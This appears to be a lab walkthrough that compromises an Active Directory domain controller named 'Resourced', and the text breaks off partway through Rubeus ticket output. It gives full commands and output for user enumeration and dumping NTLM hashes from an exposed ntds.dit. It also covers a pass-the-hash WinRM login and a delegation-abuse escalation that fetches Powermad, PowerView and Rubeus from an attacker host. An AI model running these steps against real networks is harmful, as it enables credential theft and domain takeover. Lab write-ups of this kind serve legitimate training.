Resourced

Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.206.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-10 13:21 +08
Nmap scan report for 192.168.206.175
Host is up (0.012s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-10 05:21:26Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-10T05:22:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ResourceDC.resourced.local
| Not valid before: 2024-03-21T10:42:07
|_Not valid after:  2024-09-20T10:42:07
| rdp-ntlm-info: 
|   Target_Name: resourced
|   NetBIOS_Domain_Name: resourced
|   NetBIOS_Computer_Name: RESOURCEDC
|   DNS_Domain_Name: resourced.local
|   DNS_Computer_Name: ResourceDC.resourced.local
|   DNS_Tree_Name: resourced.local
|   Product_Version: 10.0.17763
|_  System_Time: 2024-06-10T05:22:14+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  msrpc         Microsoft Windows RPC
49712/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: RESOURCEDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-06-10T05:22:15
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.48 seconds

Initial Access

Enum4Linux

Null Session

$ enum4linux -a -u '' -p '' 192.168.206.175 
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jun 10 13:25:21 2024

 =========================================( Target Information )=========================================
                                                                                                                                                                                                                  
Target ........... 192.168.206.175                                                                                                                                                                                
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==========================( Enumerating Workgroup/Domain on 192.168.206.175 )==========================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Can't find workgroup/domain                                                                                                                                                                                   
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  

 ==============================( Nbtstat Information for 192.168.206.175 )==============================
                                                                                                                                                                                                                  
Looking up status of 192.168.206.175                                                                                                                                                                              
No reply from 192.168.206.175

 ==================================( Session Check on 192.168.206.175 )==================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Server 192.168.206.175 allows sessions using username '', password ''                                                                                                                                         
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ===============================( Getting domain SID for 192.168.206.175 )===============================
                                                                                                                                                                                                                  
Domain Name: resourced                                                                                                                                                                                            
Domain Sid: S-1-5-21-537427935-490066102-1511301751

[+] Host is part of a domain (not a workgroup)                                                                                                                                                                    
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 =================================( OS information on 192.168.206.175 )=================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Can't get OS info with smbclient                                                                                                                                                                              
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Got OS info for 192.168.206.175 from srvinfo:                                                                                                                                                                 
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED                                                                                                                                            


 ======================================( Users on 192.168.206.175 )======================================
                                                                                                                                                                                                                  
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain                                                                      
index: 0xf72 RID: 0x457 acb: 0x00020010 Account: D.Durant       Name: (null)    Desc: Linear Algebra and crypto god
index: 0xf73 RID: 0x458 acb: 0x00020010 Account: G.Goldberg     Name: (null)    Desc: Blockchain expert
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xf6d RID: 0x452 acb: 0x00020010 Account: J.Johnson      Name: (null)    Desc: Networking specialist
index: 0xf6b RID: 0x450 acb: 0x00020010 Account: K.Keen Name: (null)    Desc: Frontend Developer
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0xf6c RID: 0x451 acb: 0x00000210 Account: L.Livingstone  Name: (null)    Desc: SysAdmin
index: 0xf6a RID: 0x44f acb: 0x00020010 Account: M.Mason        Name: (null)    Desc: Ex IT admin
index: 0xf70 RID: 0x455 acb: 0x00020010 Account: P.Parker       Name: (null)    Desc: Backend Developer
index: 0xf71 RID: 0x456 acb: 0x00020010 Account: R.Robinson     Name: (null)    Desc: Database Admin
index: 0xf6f RID: 0x454 acb: 0x00020010 Account: S.Swanson      Name: (null)    Desc: Military Vet now cybersecurity specialist
index: 0xf6e RID: 0x453 acb: 0x00000210 Account: V.Ventz        Name: (null)    Desc: New-hired, reminder: HotelCalifornia194!

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[M.Mason] rid:[0x44f]
user:[K.Keen] rid:[0x450]
user:[L.Livingstone] rid:[0x451]
user:[J.Johnson] rid:[0x452]
user:[V.Ventz] rid:[0x453]
user:[S.Swanson] rid:[0x454]
user:[P.Parker] rid:[0x455]
user:[R.Robinson] rid:[0x456]
user:[D.Durant] rid:[0x457]
user:[G.Goldberg] rid:[0x458]

 ================================( Share Enumeration on 192.168.206.175 )================================
                                                                                                                                                                                                                  
do_connect: Connection to 192.168.206.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)                                                                                                                        

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.206.175                                                                                                                                                                   
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ==========================( Password Policy Information for 192.168.206.175 )==========================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  

[+] Attaching to 192.168.206.175 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:192.168.206.175)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

        [+] resourced
        [+] Builtin

[+] Password Info for Domain: resourced

        [+] Minimum password length: 7
        [+] Password history length: 24
        [+] Maximum password age: 41 days 23 hours 53 minutes 
        [+] Password Complexity Flags: 000001

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 1

        [+] Minimum password age: 1 day 4 minutes 
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set



[+] Retieved partial password policy with rpcclient:                                                                                                                                                              
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
Password Complexity: Enabled                                                                                                                                                                                      
Minimum Password Length: 7


 =====================================( Groups on 192.168.206.175 )=====================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Getting builtin groups:                                                                                                                                                                                       
                                                                                                                                                                                                                  
group:[Server Operators] rid:[0x225]                                                                                                                                                                              
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]

[+]  Getting builtin group memberships:                                                                                                                                                                           
                                                                                                                                                                                                                  
Group: Remote Desktop Users' (RID: 555) has member: Couldn't lookup SIDs                                                                                                                                          
Group: Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group: Guests' (RID: 546) has member: Couldn't lookup SIDs
Group: Users' (RID: 545) has member: Couldn't lookup SIDs
Group: Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group: IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group: Administrators' (RID: 544) has member: Couldn't lookup SIDs

[+]  Getting local groups:                                                                                                                                                                                        
                                                                                                                                                                                                                  
group:[Cert Publishers] rid:[0x205]                                                                                                                                                                               
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+]  Getting local group memberships:                                                                                                                                                                             
                                                                                                                                                                                                                  
Group: Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs                                                                                                                        

[+]  Getting domain groups:                                                                                                                                                                                       
                                                                                                                                                                                                                  
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]                                                                                                                                                       
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]

[+]  Getting domain group memberships:                                                                                                                                                                            
                                                                                                                                                                                                                  
Group: 'Domain Controllers' (RID: 516) has member: resourced\RESOURCEDC$                                                                                                                                          
Group: 'Group Policy Creator Owners' (RID: 520) has member: resourced\Administrator
Group: 'Schema Admins' (RID: 518) has member: resourced\Administrator
Group: 'Domain Users' (RID: 513) has member: resourced\Administrator
Group: 'Domain Users' (RID: 513) has member: resourced\krbtgt
Group: 'Domain Users' (RID: 513) has member: resourced\M.Mason
Group: 'Domain Users' (RID: 513) has member: resourced\K.Keen
Group: 'Domain Users' (RID: 513) has member: resourced\L.Livingstone
Group: 'Domain Users' (RID: 513) has member: resourced\J.Johnson
Group: 'Domain Users' (RID: 513) has member: resourced\V.Ventz
Group: 'Domain Users' (RID: 513) has member: resourced\S.Swanson
Group: 'Domain Users' (RID: 513) has member: resourced\P.Parker
Group: 'Domain Users' (RID: 513) has member: resourced\R.Robinson
Group: 'Domain Users' (RID: 513) has member: resourced\D.Durant
Group: 'Domain Users' (RID: 513) has member: resourced\G.Goldberg
Group: 'Domain Admins' (RID: 512) has member: resourced\Administrator
Group: 'Enterprise Admins' (RID: 519) has member: resourced\Administrator
Group: 'Domain Guests' (RID: 514) has member: resourced\Guest

 =================( Users on 192.168.206.175 via RID cycling (RIDS: 500-550,1000-1050) )=================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.                                                                                                                                         
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ==============================( Getting printer info for 192.168.206.175 )==============================
                                                                                                                                                                                                                  
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED                                                                                                                                           


enum4linux complete on Mon Jun 10 13:25:58 2024

We got a list of users from the enumeration.

Administrator
krbtgt
M.Mason
K.Keen
L.Livingstone
J.Johnson
V.Ventz
S.Swanson
P.Parker
R.Robinson
D.Durant
G.Goldberg

We will also list the shares that the user can see.

$ smbclient -L //192.168.206.175 -U resourced/V.Ventz
Password for [RESOURCED\V.Ventz]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Password Audit  Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.206.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

We can see that there is a Password Audit share folder that we can access using that user.

$ smbclient //192.168.206.175/Password\ Audit -U resourced/V.Ventz
Password for [RESOURCED\V.Ventz]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Oct  5 16:49:16 2021
  ..                                  D        0  Tue Oct  5 16:49:16 2021
  Active Directory                    D        0  Tue Oct  5 16:49:15 2021
  registry                            D        0  Tue Oct  5 16:49:16 2021

                7706623 blocks of size 4096. 2652677 blocks available
smb: \> 

Getting NTLM Hashes

After going in we can see that, there are 2 folders. We will just download everything.

From these 4 files, we can use impacket-secretsdump to get the NTLM hash for all the users.

Extracting and Cracking NTDS.ditMedium

After running this command, we are able to extract all to ntlm-extract.ntds.

$ impacket-secretsdump -ntds ./Active\ Directory/ntds.dit -system ./registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-extract

$ cat ntlm-extract.ntds          
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::

After removing all the stuff that is not necessarily, we are left with the hashes.

12579b1666d4ac10f0f59f300776495f
31d6cfe0d16ae931b73c59d7e0c089c0
9ddb6f4d9d01fedeb4bccfb09df1b39d
3004b16f88664fbebfcb9ed272b0565b
3105e0f6af52aba8e11d19f27e487e45
204410cc5a7147cd52a04ddae6754b0c
19a3a7550ce8c505c2d46b5e39d6f808
3e028552b946cc4f282b72879f63b726
913c144caea1c0a936fd1ccb46929d3c
bd7c11a9021d2708eda561984f3c8939
980910b8fc2e4fe9d482123301dd19fe
fea5a148c14cf51590456b2102b29fac
08aca8ed17a9eec9fac4acdcb4652c35
62e16d17c3015c47b4d513e65ca757a2

So the next thing to do is password spray to winrm and there is one user that is pwned.

$ sudo crackmapexec winrm 192.168.206.175 -u usernames.txt -H passwords.txt
SMB         192.168.206.175 5985   RESOURCEDC       [*] Windows 10.0 Build 17763 (name:RESOURCEDC) (domain:resourced.local)
HTTP        192.168.206.175 5985   RESOURCEDC       [*] http://192.168.206.175:5985/wsman
...
WINRM       192.168.206.175 5985   RESOURCEDC       [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 (Pwn3d!)

After logging in, we are able to get the shell as L.Livingstone.

$ evil-winrm -u L.Livingstone -H '19a3a7550ce8c505c2d46b5e39d6f808' -i 192.168.206.175
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> whoami
resourced\l.livingstone

Privilege Escalation

Bloodhound

From BloodHound, we can see that the user has GenericAll control over the whole target itself.

Abusing GenericAll

Firstly, we will import Powermad and Powerview modules.

iwr -uri http://192.168.45.196/Powermad/Powermad.ps1 -Outfile Powermad.ps1
iwr -uri http://192.168.45.196/PowerView.ps1 -Outfile PowerView.ps1
. ./Powermad.ps1
. ./PowerView.ps1

Next we will create a new account

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
[+] Machine account attackersystem added

Then, we will use PowerView to retrieve the security identifier (SID) of the newly created computer account

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

We now need to build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we are taking over, again using PowerView.

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Next, we will download Rubeus to the target machine.

iwr -uri http://192.168.45.196/Rubeus.exe -Outfile Rubeus.exe

We can then use Rubeus to has the plaintext password into its RC4_HMAC form.

*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> ./Rubeus.exe hash /password:Summer2018! /domain:resourced.local /user:attackersystem

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.1.2


[*] Action: Calculate Password Hash(es)

[*] Input password             : Summer2018!
[*] Input username             : attackersystem
[*] Input domain               : resourced.local
[*] Salt                       : RESOURCED.LOCALattackersystem
[*]       rc4_hmac             : EF266C6B963C0BB683941032008AD47F
[*]       aes128_cts_hmac_sha1 : 73D5B2DC169CDF3FE96F0265D7D271CE
[*]       aes256_cts_hmac_sha1 : 1FEFAA52A706E3862120833598F5517C4310E553F564DB4A879FDD742C62BBDD
[*]       des_cbc_md5          : 58E9206458DC0B9E

We will use Rubeus' s4u module to get a service ticket for the service name we want to "pretend" to be "administrator" for. This ticket is injected.

*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> ./Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:administrator /msdsspn:cifs/ResourceDC.resourced.local /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.1.2

[*] Action: S4U

[*] Using rc4_hmac hash: EF266C6B963C0BB683941032008AD47F
[*] Building AS-REQ (w/ preauth) for: 'resourced.local\attackersystem$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFSjCCBUagAwIBBaEDAgEWooIETzCCBEthggRHMIIEQ6ADAgEFoREbD1JFU09VUkNFRC5MT0NBTKIk
      MCKgAwIBAqEbMBkbBmtyYnRndBsPcmVzb3VyY2VkLmxvY2Fso4IEATCCA/2gAwIBEqEDAgECooID7wSC
      A+tqeqQml7FYPLN4VTKU1OMrKSrluHlO5FMsKpdeaVSYow1YQeq0Q3d46nsnCOt3aOuH9bFovxpf/3CM
      GNmbs1PQTvSLEoiv3HDuP9KmgsBuye8WTLWtj9QfVW4qlHZB3drt6kQAht/SPpzLVRUksxtvJ7JvjgWI
      AKdZLmio5aUiBtlnuq2H5vamQBONq+aY//WLNqkg9/jlNCpcnRVI3RESTaYtMZog6aRSgUon7UfoPgAa
      lUSS9XmCLDU5uXXa8bNL8jqCS4mdhKSiXwumHhMni+/kmxZYOCwCSgHFIR0GE8hHOJxRU53f9xvK0VXr
      zFpJdIDx/NW/7waCS17nCV+AqBacvK3F9/67bLoyAqWB7aJvCxl/COqNZBjcoUguw0uBFFuVWAEiG/JD
      QZIqx4SWeEvRZf/JW1LwzwtSkCgvaeKq6TKhtw7VRhUa3IOinds526uCzO1iIgiDxVL/85BiHP261SbS
      fpcOghEV0a1bAcYBjAT1xKNsCWZeqXRNz/ZURb0IvLazMcWnxX1+ZR660ICJCpHgShDKMcBLVhnwaTFO
      UC1cRDH2tonbmJ3FKfo2nbpmeLgOEqNEEl0qcEo7+cULYWas8joH78PbUwXzn9HBxJpQzUR2/t7YlWyw
      IWxlisYrJN9ObHstdxJe9tETTn9GlFluqfnCU60BKRaS4jNsp5kpsXcVu1d/+NSRSS+yNMXDb+NC+IUl
      HVcsKgBfYEM4WaZtHJbZvtRlmCkYUW9i5sM0QJnMnlGJ0UyVOb/vkiAow/q7GcHk4tmWA/NWugSsE+17
      IB639rzHmn6gwND42n51kZYUxVkX6VOFLPoPOqEQESQ6lDMV2paScm4yIvwHhf6clirwP0GMtccG9247
      IuzMwLkXS/3GRyUTSXdihECJR8Oozfp4937J5JXDLcr8XbCGFm4rjAnQPSGH6mJICNCSy5MkF4U24l/Y
      QGfz7VRp0VawTYm3yUcwyyGSMhXs3iwZhb2NkSMi8MWbnVEr47neA36qwPw2HFjg5nOctAXBcBnUyIds
      k/+rkXadOiqScyvrtpK+PrefJRBnLZrPOaDJXHz8nbmRn02y3k3lu4dvmmpEXICOTaSyw72lgzg9+unx
      hmcyhTS5M1gOq1LhRxy52yisgLmTdB9ibFyZf9BANuPx9gAq0S5ineo9oxSYBi9Ct0W5s3d+GHvYL4KA
      aSLL1mf/XLPHGiO2hcOSFt7j1JWvpJW8dbCNz0kC+GQDvV9N5+7cPFJWZ8XR8lUUy2mc40AfivWsfhEv
      txIATp8VslQhi8G+eJnXez1lJ9Sw+uwJVrIFaFd0dFUrMoDYXFnUSFKn3Xu0o4HmMIHjoAMCAQCigdsE
      gdh9gdUwgdKggc8wgcwwgcmgGzAZoAMCARehEgQQqcOgITSRZFO6+/+G3IzDg6ERGw9SRVNPVVJDRUQu
      TE9DQUyiHDAaoAMCAQGhEzARGw9hdHRhY2tlcnN5c3RlbSSjBwMFAEDhAAClERgPMjAyNDA2MTEwMjMw
      NDhaphEYDzIwMjQwNjExMTIzMDQ4WqcRGA8yMDI0MDYxODAyMzA0OFqoERsPUkVTT1VSQ0VELkxPQ0FM
      qSQwIqADAgECoRswGRsGa3JidGd0Gw9yZXNvdXJjZWQubG9jYWw=


[*] Action: S4U

[*] Building S4U2self request for: 'attackersystem$@RESOURCED.LOCAL'
[*] Using domain controller: ResourceDC.resourced.local (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'attackersystem$@RESOURCED.LOCAL'
[*] base64(ticket.kirbi):

      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
      eXN0ZW0k

[*] Impersonating user 'administrator' to target SPN 'cifs/ResourceDC.resourced.local'
[*] Building S4U2proxy request for service: 'cifs/ResourceDC.resourced.local'
[*] Using domain controller: ResourceDC.resourced.local (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/ResourceDC.resourced.local':

      doIGmDCCBpSgAwIBBaEDAgEWooIFljCCBZJhggWOMIIFiqADAgEFoREbD1JFU09VUkNFRC5MT0NBTKIt
      MCugAwIBAqEkMCIbBGNpZnMbGlJlc291cmNlREMucmVzb3VyY2VkLmxvY2Fso4IFPzCCBTugAwIBEqED
      AgEHooIFLQSCBSlgWUhJ930BmG07j9D7u5K0mUH/SkXzkzq4uNYvFn5gZG2DTW5xVk3oaLlgWr01bK9g
      4ecdTOkcN9Gq1WTBV0SGmoqJwSuUOGfXpv8HErYPhtirdRi9GdJKpFDxdk+w5iL+tlf8izfNrBgeRzc+
